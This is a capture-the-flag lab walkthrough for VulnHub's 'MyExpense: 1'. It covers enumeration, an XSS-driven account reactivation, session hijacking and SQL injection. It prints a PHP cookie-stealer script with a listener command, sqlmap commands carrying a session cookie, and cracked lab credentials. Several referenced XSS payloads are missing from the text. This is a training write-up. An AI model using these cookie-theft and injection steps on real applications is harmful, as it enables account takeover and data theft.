MyExpense: 1 Lab WalkThrough

Written By Ankush Prasad Sah

Ankush Prasad Sah

~7 min read · January 21, 2026 (Updated: January 21, 2026) · Free: Yes

Machine name: MyExpense: 1

Machine url: https://www.vulnhub.com/entry/myexpense-1,405/

Vulnerable machine IP: 10.160.0.33

Attacker(Kali Machine) IP: 10.160.0.71

1. Network Discovery and Enumeration

The assessment began by identifying active hosts on the network to locate the target.

Host Identification

I performed an ARP scan to identify the target's MAC address and vendor information.

Command: arp-scan -l
Result: Confirmed the vulnerable machine is at 10.160.0.33.

All Port and Service Scanning

Next, I conducted a full port scan, version scan to identify running services.

Command: nmap 10.160.0.33 -p- -sV -T5 -vv
Results:
Port 80 (HTTP): Apache httpd 2.4.25 (Debian).
Ports 38893, 48643, 55613, 59173: Multiple instances of Mongoose httpd.

Directory Brute-Forcing

I used ffuf to discover hidden directories and files on the web server.

Command: ffuf -u "http://10.160.0.33/FUZZ" -w /usr/share/wordlists/dirb/common.txt
Findings: Discovered several interesting paths including /admin, /config, robots.txt, and signup.php.

2. Vulnerability Research and Initial Access

The target website "MyExpense" Initial Page. And can view that there are two web pages we can access from here

1. /login.php

2. /signup.php

Information Leakage

Then I examined robots.txt(which we got in directory listing), which revealed a disallowed entry for an admin page.

Path: http://10.160.0.33/admin/admin.php

Discovery: This page contained a list of all application users, their roles, and account statuses. I noted that a user named Samuel Lamotte (slamotte) was currently "Inactive".

Looks like we can't active Samuel Lamotte normally.

Lets try some XSS scripting on the signup.php page

Exploiting Broken Access Control

The signup.php page had a disabled "Sign up" button.

Action: I bypassed this client-side restriction by editing the HTML code to change the button attribute from disabled to enabled.
Result: This allowed me to create a new account successfully.

The Account has been Created

And Our XSS script Is Also Working.

Now We will Create An Another Account Except this time we will modify our XSS Payload To activate the account Belonging to Samuel Lamotte for us (we are pushing this payload on firstname and last name)

The Payload we made from the following url:

We have successfully reactivated the account belonging to Samuel Lamotte and can successfully login to the application using the creds provided slamotte/fzghn4lw

As Samuel has been Active we logged in his account.

Next we check the expenses section. As per the description of our goal is to validate our last expense report. We submit the application

Now, As we were browsing the profile section we got the manager name: Manon Riviere

Now we have to escalate to Manager account

Navigating the index.php page. After Visiting the Website we discovered that a stored XSS vulnerability exists in what appears to be a managers messaging system.

3. Stealing the Manager's Session

I set up a PHP cookie stealer on my attacker machine (10.160.0.71) to capture active sessions.

· Go to /var/www/html

Attacker Script (cookie.php):

<?php

$cookies = $_GET['cmd'];

$file = fopen('log.txt', 'a');

fwrite($file,$cookies."/n");

Listening Command: php -S 10.160.0.71:80

Then I used an XSS payload to force the administrator's browser to send their session cookie to my server.

We going to use the same cookiestealer to get manager phpsessid.

We Applied this Payload onto the Message section to get Other Users as well as Manager PhpSessID.

We Captured Many PHPSESSID…

And we also got the Manager PHPSESSID.

We used Cookie Editor Extensions in Firefox to Change Cookies we got.

By hijacking the session of the manager, Manon Riviere (mriviere), I gained elevated access to the application.

We have to pass the expense.

When We are Logging back into the account belonging to Samuel Lamotte we can see that our report has been validated, however we still do not see the flag.

4. Escalating to Finance Approver Account

We got once more person a Financial Approver in /index.php. that have the status of our report to pass this expense.

Now we have to Escalate to Finance Approver Account(Paul Baudouin) to pass that expense.

After some manual testing it was discovered that an SQL injection vulnerability exists in the Rennes(Manager) page

SQL Injection (SQLi)

While navigating the manager's site page, I discovered a GET-based SQL injection vulnerability in the id parameter.

Tool: sqlmap
Command: sqlmap -u http://10.160.0.33/site.php?id=2 — headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" — cookie="PHPSESSID=d76dcp7demcfq8777t8dsmna63"

Next We Enumerate the Tables:

# sqlmap -u http://10.160.0.33/site.php?id=2 — headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" — cookie="PHPSESSID=d76dcp7demcfq8777t8dsmna63" –tables

We Got this Database and 4 table Lets check the Expense one as we need to pass the expense.

Dumping the data from the expense table we can gather a list of users and their hashed passwords:

We grab the password hash for user pbaudouin, upload it to crackstation and successfully retrieve the decoded password

Password Cracking

I used an online cracker to decrypt the finance approver's hash.

Hash: 64202ddd5fea4cc5c2f856efef36e1a
Result: Password cracked as HackMe.

5. Capturing the Flag

Logging into the account belonging to Paul Baudouin using credentials pbaudouin/HackMe and navigating to the expenses tab we can see the expense report for Samuel Lamotte and validate it.

Lets Approve these Expense Reports.

Apprroving All these Expenses

Finally, we log back into the account belonging to Samuel Lamotte and navigate to the expense tab.

The flag is : flag{H4CKY0URL1F3}

Written by Ankush Prasad Sah

#expenses #cybersecurity #red-teaming #sql #xss-vulnerability

MyExpense: 1 Lab WalkThrough

Written By Ankush Prasad Sah

Reporting a Problem